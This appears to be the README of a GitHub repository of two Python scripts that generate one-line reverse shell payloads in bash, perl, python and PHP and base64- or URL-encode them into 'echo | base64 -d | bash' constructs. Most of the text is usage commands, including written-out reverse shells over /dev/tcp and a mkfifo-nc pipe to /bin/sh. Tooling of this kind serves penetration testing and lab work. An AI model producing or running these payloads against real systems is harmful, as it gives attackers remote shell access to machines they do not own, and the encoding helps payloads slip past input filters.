Scripts for generating reverse shells based mostly on PayloadAllTheThings.
Using one script you can generate one-line reverse shell payloads.
Using the other script you can base64 encode the reverse shell payload when appropiate. This encoding takes into account bad chars for supporting channels as http (url friendly base64 encoded payloads).
I normally use the one-liner to pipe the result into the encoder when appropiate.
The tools are 2 scripts:
- rs_oneliner.py: Mostly one-liner reverse shell generator, based on PayloadsAllTheThings
- rs_b64encode.py: Use it in convination with rs_oneliner.py when appropiate payloads are used (payloads normally to be executed in a bash context). Using the --echo It can help you constructing an echo <base64_encoded_payload> | base64 -d | bash construct. And with --echo and --url it will use url encode the payload too.
Minimal execution needs:
git clone https://github.com/arale61/reverse_shells_tools.git
cd reverse_shells_tools
python ./rs_oneliner.py -h
python ./rs_b64encode.py -h
How I prefer to use it:
- I have my own local bin path where these scripts are copied and set as executables:
~/.local/bin/rs_oneliner.py
~/.local/bin/rs_b64encode.py
- This local bin path is added in my PATH environment variable in my .zshrc or .bashrc:
export PATH=$PATH:$HOME/.local/bin
- Then use them as any other executable available for you.
- Simple bash tcp reverse shell:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash
- Simple bash udp reverse shell:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash --udp
- Simple perl tcp reverse shell for windows:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --perl --win
- Pipe into rs_b64encode.py:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py
- Pipe into rs_b64encode.py and construction echo decode payload:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py --echo
- Pipe into rs_b64encode.py and construction echo decode url_quote_plus encode payload:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py --echo --url
- Simple safe base64 encode:
./rs_b64encode.py -p 'bash -i >& /dev/tcp/127.0.0.1/6161 0>&10'
- Simple safe base64 encode and use echo decode construct:
echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 6161 >/tmp/f' | ./rs_b64encode.py --echo
#or
./rs_b64encode.py -p 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 6161 >/tmp/f' --echo
- Pipe with rs_oneliner.py:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --python | ./rs_b64encode.py
- Pipe with rs_oneliner.py and construction echo decode payload:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --perl | ./rs_b64encode.py --echo
- Pipe into rs_b64encode.py and construction echo decode url_quote_plus encode payload:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --phpsystem | ./rs_b64encode.py --echo --url